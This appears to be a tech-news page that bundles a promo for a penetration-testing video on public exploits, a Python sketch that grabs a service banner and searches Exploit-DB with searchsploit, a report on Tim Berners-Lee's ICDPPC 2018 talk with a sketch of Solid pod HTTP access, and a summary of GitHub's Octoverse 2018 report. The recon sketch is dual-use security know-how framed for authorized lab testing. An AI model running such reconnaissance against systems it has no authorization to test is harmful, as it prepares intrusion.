In this video, Gergely Révay shows how to use public exploits against a vulnerability in software running on a Windows 10 machine. Watch Gergely's video below to learn how to use public exploits, demonstrated with a practical example using exploit-db.com.
https://www.youtube.com/watch?v=2YoYyWGFU6A

About Gergely Révay

Gergely Révay, the instructor of this course, is a penetration testing Senior Key Expert at Siemens Corporation, Germany. He has worked as a penetration tester since 2011. Before that, he was a quality assurance engineer in his home country, Hungary. As a consultant, he performed penetration tests and security assessments in various industries, such as insurance, banking, telco, mobility, healthcare, industrial control systems, and even car production. To know more about public exploits and to master various exploits and post-exploitation techniques, check out Gergely's course, 'Practical Windows Penetration Testing [Video]'.

jQuery File Upload plugin exploited by hackers over 8 years, reports Akamai's SIRT researcher
MongoDB switches to Server Side Public License (SSPL) to prevent cloud providers from exploiting its open source code
A year later, Google Project Zero still finds Safari vulnerable to DOM fuzzing using publicly available tools to write exploits
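This sketch is not from the video, but it makes the "version first, then public exploit" point concrete: a minimal Python example of the first reconnaissance step, grabbing a service banner to learn the software and version, then looking up matching public exploits in a local Exploit-DB copy. It assumes the searchsploit command-line tool from Exploit-DB is installed and on your PATH; the host, port, and search term are hypothetical lab values, and you should only run anything like this against systems you are authorized to test.

# Minimal sketch: identify a service version, then search Exploit-DB for public exploits.
# Assumes the searchsploit CLI (Exploit-DB's offline search tool) is installed.
import socket
import subprocess


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect to a TCP service and return whatever banner it volunteers."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        try:
            return sock.recv(1024).decode(errors="replace").strip()
        except socket.timeout:
            return ""


def search_public_exploits(keyword: str) -> str:
    """Search the local Exploit-DB mirror via searchsploit for a product/version string."""
    result = subprocess.run(
        ["searchsploit", keyword], capture_output=True, text=True, check=False
    )
    return result.stdout


if __name__ == "__main__":
    # Hypothetical lab VM and port; replace with your own authorized target.
    banner = grab_banner("192.168.56.101", 21)
    print(f"Service banner: {banner!r}")

    # In practice, extract the product and version from the banner
    # (e.g. "vsftpd 2.3.4") and use that as the search term.
    if banner:
        print(search_public_exploits("vsftpd 2.3.4"))

Once a candidate exploit is found this way, the same caveats from the article apply: it still has to match the target's exact version, configuration, and OS before it will work.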

Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018

Sugandha Lahoti
25 Oct 2018
4 min read
At the ongoing 40th International Conference of Data Protection and Privacy Commissioners (ICDPPC), Sir Tim Berners-Lee spoke on ethics and the Internet. The ICDPPC conference, which is taking place in Brussels this week, brings together an international audience on digital ethics, a topic the European Data Protection Supervisor initiated in 2015. Some high-profile speakers and their presentations include Giovanni Buttarelli, European Data Protection Supervisor, on 'Choose Humanity: Putting Dignity back into Digital'; a video interview with Guido Raimondi, President of the European Court of Human Rights; Tim Cook, CEO of Apple, on personal data and user privacy; and 'What is Ethics?' by Anita Allen, Professor of Law and Professor of Philosophy, University of Pennsylvania, among others.

Per TechCrunch, Tim Berners-Lee has urged tech industries and experts to pay continuous attention to the world their software is consuming as they go about connecting humanity through technology. "Ethics, like technology, is design. As we're designing the system, we're designing society. Ethical rules that we choose to put in that design [impact the society]... Nothing is self-evident. Everything has to be put out there as something that we think will be a good idea as a component of our society," he told the delegates present at the conference.

He also described digital platforms as "socio-technical systems" - meaning "it's not just about the technology when you click on the link it is about the motivation someone has, to make such a great thing and get excited just knowing that other people are reading the things that they have written". "We must consciously decide on both of these, both the social side and the technical side," he said. "The tech platforms are anthropogenic. They're made by people. They're coded by people. And the people who code them are constantly trying to figure out how to make them better."

According to TechCrunch, he also touched on the Cambridge Analytica data misuse scandal as an illustration of how socio-technical systems are exploding simple notions of individual rights. "Your data is being taken and mixed with that of millions of other people, billions of other people in fact, and then used to manipulate everybody. Privacy is not just about not wanting your own data to be exposed - it's not just not wanting the pictures you took of yourself to be distributed publicly. But that is important too."

He also revealed new plans for his startup, Inrupt, which was launched last month to change the web for the better. His major goal with Inrupt is to decentralize the web and to loosen gigantic tech monopolies' (Facebook, Google, Amazon, etc.) stronghold over user data. He hopes to achieve this with Inrupt's new open-source project, Solid, a platform built on the existing web (a rough sketch of the underlying idea appears at the end of this piece). He explained that the platform can put people in control of their own data: the app asks you where you want to put your data, so "you can run your photo app or take pictures on your phone and say I want to store them on Dropbox, and I will store them on my own home computer. And it does this with a new technology which provides interoperability between any app and any store."

"The platform turns the privacy world upside down - or, I should say, it turns the privacy world right side up.
You are in control of your data life... Wherever you store it, you can control and get access to it."

He concluded by saying, "We have to get commitments from companies to make their platforms constructive and we have to get commitments from governments to look at whenever they see that a new technology allows people to be taken advantage of, allows a new form of crime to get onto it by producing new forms of the law. And to make sure that the policies that they do are thought about in respect to every new technology as they come out."

The day before yesterday, The Public Voice Coalition, an organization that promotes public participation in decisions regarding the future of the Internet, came out with guidelines for AI, namely the Universal Guidelines on Artificial Intelligence, at ICDPPC.

Tim Berners-Lee plans to decentralize the web with 'Solid', an open-source project for "personal empowerment through data"
EPIC's Public Voice Coalition announces Universal Guidelines for Artificial Intelligence (UGAI) at ICDPPC 2018
California's tough net neutrality bill passes state assembly vote
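The quoted description of Solid is conceptual, but the core technical idea is that a user's data pod is a set of ordinary web resources addressed by URLs, so any app can read and write them with standard HTTP requests, subject to the pod's access controls. The Python sketch below illustrates that idea under stated assumptions: the pod URL is hypothetical, the standard requests library is used, and a real Solid app would add authentication (for example Solid-OIDC) and linked-data vocabularies on top of this.

# Rough sketch of Solid's core idea: your data lives at URLs you control,
# and any app can read/write it over plain HTTP if the pod's permissions allow.
# The pod URL below is hypothetical; real apps authenticate (e.g. via Solid-OIDC).
import requests

POD_RESOURCE = "https://alice.example-pod.org/public/notes/hello.txt"  # hypothetical pod URL


def write_note(url: str, text: str) -> int:
    """Store a plain-text note at a pod URL (assumes the app is allowed to write there)."""
    response = requests.put(
        url,
        data=text.encode("utf-8"),
        headers={"Content-Type": "text/plain"},
    )
    return response.status_code


def read_note(url: str) -> str:
    """Read the note back; any other app pointed at the same URL sees the same data."""
    response = requests.get(url)
    response.raise_for_status()
    return response.text


if __name__ == "__main__":
    print("PUT status:", write_note(POD_RESOURCE, "Data stays in a store the user chose."))
    print("Note:", read_note(POD_RESOURCE))

The point of the sketch is the separation of app and store: the application only knows a URL the user handed it, so the user can later point a different app at the same data, or move the data to a different pod, without either app changing.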


What we learnt from the GitHub Octoverse 2018 Report

Amey Varangaonkar
24 Oct 2018
8 min read
Highlighting key accomplishments over the last year, Microsoft's recent major acquisition, GitHub, released its yearly Octoverse report. The last 365 days have seen GitHub go from strength to strength as the world's leading source code management platform. The Octoverse report highlights how developers work and learn on GitHub. It also gives us some interesting insights into the way developers and organizations are collaborating across geographies and time zones on a variety of interesting projects. The Octoverse report is based on data collected from October 1, 2017 to September 30, 2018 - exactly 365 days from the publication of the last Octoverse report. In this article, we look at some of the key takeaways from the Octoverse 2018 report.

Asia is home to GitHub's fastest growing community

GitHub developers currently based in Asia can feel proud of themselves. Octoverse 2018 states that more open source projects have been created in Asia than anywhere else in the world. While developers all over the world are joining and using GitHub, most new signups over the last year have come from countries such as China, India, and Japan. At the same time, GitHub usage is also growing quite rapidly in Asian countries such as Hong Kong, Singapore, Bangladesh, and Malaysia. This is quite interesting, considering the growth of AI has become part of national policy in countries such as China, Hong Kong, and Japan. We can expect these trends to continue, and developing countries such as India and Bangladesh to contribute even more going forward.

An ever-growing developer community squashes doubts about GitHub's credibility

When Microsoft announced its plans to buy GitHub in a deal worth $7.5 billion, many eyebrows were raised. Given Microsoft's earlier stance against open source projects, some developers were skeptical of the move. They feared that Microsoft would exploit GitHub's popularity and inject some kind of subscription model into GitHub in order to recover the huge investment. Many even migrated their projects from GitHub to rival platforms such as Bitbucket and GitLab in protest.

However, the numbers presented in the Octoverse report suggest otherwise. According to the report, the number of new registrations last year alone was more than the number of registrations in GitHub's first six years, which is quite impressive. The number of active contributors on GitHub has increased by more than 1.5 times over the last year, suggesting GitHub is still the undisputed leader when it comes to code management and collaboration. With more than 1.1 billion contributions across private and public projects in one year, I think we all know where most developers' loyalty lies.

Not just developers, organizations love GitHub too

The Octoverse report states that 2.1 million organizations are using GitHub in some capacity, across public and private repositories. This number is a staggering 40% increase from 2017 - indicating the huge reliance on GitHub for effective code management and collaboration between developers. Not just that, over 150,000 developers and organizations are using the apps and tools available on the GitHub Marketplace for quick, efficient, and seamless code development and management. GitHub had also launched a feature called security alerts back in November 2017. This feature alerts developers to vulnerabilities in their project dependencies and also suggests fixes for them from the community.
Many organizations have found this feature to be an invaluable offering from GitHub, as it allows for the development of secure, bug-free applications. Their faith in GitHub will be reinforced even more now that the report has revealed that, over the last year, more than 5 million vulnerabilities were detected and communicated to developers. The report also suggests that members of an organization make substantial contributions to projects and are twice as active when they install and use the company's app on GitHub. This suggests that GitHub offers them the best environment and the flexibility to develop apps just as they want. All these insights point towards one simple fact: organizations and businesses trust GitHub.

Microsoft is walking the talk with active open source contribution

Microsoft joined the Linux Foundation after its initial (and vehement) opposition to the open source movement. With a change in leadership and long-term vision came the realization that open source is essential for them - and the world - to progress. Eventually, they declared their support for the cause by going platinum with the Open Source Initiative. That is now clearly being reflected in their achievements of the past year. Probably the most refreshing takeaway from the Octoverse report was to see Microsoft leading the pack when it comes to active open source contribution. The report states that Microsoft's VSCode was the top open source project with 19,000 contributors. It also showed that the open source documentation of Azure was the fastest growing project on GitHub.

Top open source projects on GitHub (Image courtesy: GitHub State of Octoverse 2018 Report)

If this was not enough evidence that Microsoft has backed up its claims of supporting the open source movement wholeheartedly, there's more. Over 7,000 Microsoft employees have contributed to various open source projects over the past year, making it the organization with the most open source contributions.

Open source contribution by organization (Image source: GitHub State of Octoverse 2018 Report)

When we said that Microsoft's acquisition of GitHub was a good move, we were right!

React Native and machine learning are red hot right now

React Native has been touted by many to be the future of mobile development. This claim is corroborated by some strong activity on its GitHub repository over the last year. With over 10k contributors, React Native is one of the most active open source projects right now. With JavaScript continuing to rule the roost as the top programming language for the 5th straight year, it comes as no surprise that the cross-platform framework for building native apps is getting a lot of traction.

Top languages over time (Image source: GitHub State of Octoverse 2018 Report)

With the rise in popularity of artificial intelligence, and specifically machine learning, the report also highlighted the continued rise of TensorFlow and PyTorch. While TensorFlow is the third most popular open source project right now with over 9,000 contributors, PyTorch is one of the fastest growing projects on GitHub. The report also showed that Google's and Facebook's experimental frameworks for machine learning, called Dopamine and Detectron respectively, are getting deserved attention thanks to how they are simplifying machine learning. Given the scale at which AI is being applied in the industry right now, these tools are expected to make developers' lives easier going forward.
Hence, it is not surprising to see developers' interest centered around these tools.

GitHub's Student Developer Pack to promote learning is a success

According to the Octoverse report, over 1 million developers have honed their skills by learning best coding practices on GitHub. With over 600,000 active student developers learning how to write effective code through the Student Developer Pack, GitHub continues to give free access to the best development tools so that students learn by doing and get valuable hands-on experience. In academia, yet another fact that points to GitHub's usefulness for learning is how teachers use the platform to implement real-world workflows for teaching. Over 20,000 teachers in over 18,000 schools and universities have used GitHub to create over 200,000 assignments to date. It is safe to say that this number is only going to grow in the near future. You can read more about how GitHub is promoting learning in the GitHub Education Classroom Report.

GitHub's competition has some serious catching up to do

Since Google's parent company Alphabet lost out to Microsoft in the race to buy GitHub, it has diverted its attention to GitHub's competitor, GitLab. Alphabet has even gone on to suggest that GitLab can surpass GitHub. According to the Octoverse report, Google is second only to Microsoft when it comes to open source contributions by an organization. With GitLab joining forces with Google by moving its operations from Azure to Google Cloud Platform, we might see Google's contribution to GitHub reduce significantly over the next few years. Who knows, the next Octoverse report might not feature Google at all!

That said, the size of the GitHub community, along with the volume of activity that happens on the platform every day, is staggering, and no other platform comes close. This fact is supported by the enormity of some of the numbers the report presents:

- There are over 31 million developers on the platform to date.
- More than 96 million repositories are currently hosted on GitHub.
- 65 million pull requests were created in the last year alone, accounting for almost 33% of the total number of pull requests created to date.

These numbers dwarf those of other platforms such as GitLab and Bitbucket. Not only is GitHub the world's most popular code collaboration and version control platform, it is currently the #1 tool of choice for most developers in the world. It will take some catching up for the likes of GitLab and others to come even close to GitHub.

In 5 years, machines will do half of our job tasks of today; 1 in 2 employees need reskilling/upskilling now – World Economic Forum survey
Survey reveals how artificial intelligence is impacting developers across the tech landscape
What the IEEE 2018 programming languages survey reveals to us